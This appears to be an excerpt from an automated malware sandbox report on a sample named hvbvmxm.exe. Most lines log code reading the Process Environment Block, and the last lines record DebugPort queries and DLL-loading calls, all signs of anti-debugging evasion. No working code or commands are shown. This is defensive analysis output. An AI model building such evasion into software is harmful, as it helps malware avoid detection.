          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AD4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ACAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ACAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AD3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B6B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B6B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B88A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B44257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B85BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B6D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B88B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B714FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B88CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AD746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B4C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B4C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B68DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ACD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ACD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B36DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B3A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B88D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B33540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B63D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AD7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B346A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B4FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B88ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B6FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B6FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B4FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B4FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B8070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B8070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ACFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B88F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ACEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0040C317 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040AB9E SetUnhandledExceptionFilter,
